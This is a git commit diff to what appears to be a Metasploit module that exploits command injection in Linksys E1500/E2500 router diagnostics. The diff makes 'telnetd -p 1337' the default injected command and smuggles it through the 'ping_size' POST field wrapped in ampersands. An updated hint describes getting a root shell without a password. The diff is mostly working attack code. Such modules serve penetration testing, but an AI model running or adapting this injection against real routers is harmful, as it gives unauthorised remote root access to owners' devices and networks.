fixed encoding and set telnetd as default cmd

m-1-k-3 · m-1-k-3 · commit b2bf1df098b1 · 2013-03-23T22:56:15.000+01:00
diff --git a/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb b/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb
@@ -23,7 +23,8 @@ def initialize(info = {})
 				not see any output of your command. Try a ping command to your local system for a
 				first test.
 
-				Hint: To get a remote shell you could upload a cross-compiled netcat binary and exec it.
+				Hint: To get a remote shell you could start telnetd and touch /etc/group. Use the 
+				user root without a password for accessing the device.
 			},
 			'Author'          => [ 'm-1-k-3' ],
 			'License'         => MSF_LICENSE,
@@ -35,14 +36,13 @@ def initialize(info = {})
 					[ 'OSVDB', '89912' ],
 					[ 'BID', '57760' ]
 				],
-			'DefaultTarget'  => 0,
 			'DisclosureDate' => 'Feb 05 2013'))
 
 		register_options(
 			[
 				OptString.new('USERNAME',[ true, 'User to login with', 'admin']),
 				OptString.new('PASSWORD',[ true, 'Password to login with', 'password']),
-				OptString.new('CMD', [ true, 'The command to execute', 'ping 127.0.0.1'])
+				OptString.new('CMD', [ true, 'The command to execute', 'telnetd -p 1337'])
 			], self.class)
 	end
 
@@ -90,15 +90,14 @@ def run
 					'uri'    => uri,
 					'method' => 'POST',
 					'authorization' => basic_auth(user,pass),
-					'encode_params' => false,
 					'vars_post' => {
 						"submit_button" => "Diagnostics",
 						"change_action" => "gozila_cgi",
 						"submit_type" => "start_ping",
 						"action" => "",
 						"commit" => "0",
 						"ping_ip" => "1.1.1.1",
-						"ping_size" => "%26#{cmd}%26",
+						"ping_size" => "&#{cmd}&",
 						"ping_times" => "5",
 						"traceroute_ip" => ""
 						}
